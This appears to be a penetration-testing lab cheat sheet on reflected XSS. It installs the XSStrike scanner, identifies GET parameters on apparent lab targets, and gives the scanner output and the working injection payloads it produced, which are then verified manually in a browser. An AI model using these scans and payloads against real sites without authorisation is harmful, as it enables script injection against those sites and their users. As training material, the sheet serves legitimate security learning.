XSS TESTING (HYBRID)

INSTALL AUTOMATED XSS DISCOVERY TOOL

root@oco:~$ git clone https://github.com/s0md3v/XSStrike.git
root@oco:~$ cd XSStrike
root@oco:~$ pip install -r requirements.txt
root@oco:~$ chmod 777 xsstrike.py

PERFORM HYBRID DISCOVERY (MAIN PAGE)

#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 * review the HTML source and identify parameters
 * also review the .js file

#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port} > F12
 input fields: fill in data
 * copy the full URL to identify GET request parameters
    - http://94.237.60.32:30702/index.php?fullname=bughunter&username=debugger&password=password&email=email%40null.com
       - fullname, username, password, email 

#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com"
 XSStrike v3.1.5
  [~] Checking for DOM vulnerabilities 
  [+] WAF Status: Offline 
  [!] Testing parameter: fullname 
  [-] No reflection found 
  [!] Testing parameter: username 
  [-] No reflection found 
  [!] Testing parameter: password 
  [-] No reflection found 
  [!] Testing parameter: email 
  [!] Reflections found: 1 
  [~] Analysing reflections 
  [~] Generating payloads 
  [!] Payloads generated: 3072 
  ------------------------------------------------------------
  [+] Payload: <hTML%0donpoiNtEreNtER+=+(prompt)``// 
  [!] Efficiency: 100 
  [!] Confidence: 10 
  [?] Would you like to continue scanning? [y/N]
  
#manually verify the identified parameter
root@oco:~$ BROWSER > http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=<hTML%0donpoiNtEreNtER+=+(prompt)``//
 * a prompt will be displayed

PERFORM HYBRID DISCOVERY (SUBDIRECTORY)

#perform code review
root@oco:~$ BROWSER > {targetSite:port}/{subdirectory} > CTRL + U
 * review the HTML source and identify parameters
 * also review the .js file

#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port}/{subdirectory} > F12
 input fields: fill in data
 * copy the full URL to identify GET request parameters
    - http://10.129.171.142/phishing/index.php?url=ytrst
 
#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://ACADEMY-XSS-ASMT/phishing/index.php?url=ytrst"
 XSStrike v3.1.5
  [~] Checking for DOM vulnerabilities 
  [+] WAF Status: Offline 
  [!] Testing parameter: url 
  [!] Reflections found: 1 
  [~] Analysing reflections 
  [~] Generating payloads 
  [!] Payloads generated: 3096 
  ------------------------------------------------------------
  [+] Payload: '><D3v%0aONpOINteReNtER%09=%09(prompt)``%0dx>v3dm0s 
  [!] Efficiency: 100 
  [!] Confidence: 9 
  [?] Would you like to continue scanning? [y/N] N
  
#manually verify the identified parameter
root@oco:~$ BROWSER > http://10.129.171.142/phishing/index.php?url='><D3v%0aONpOINteReNtER%09=%09(prompt)``%0dx>v3dm0s
 * text string will be applied to the page

Last updated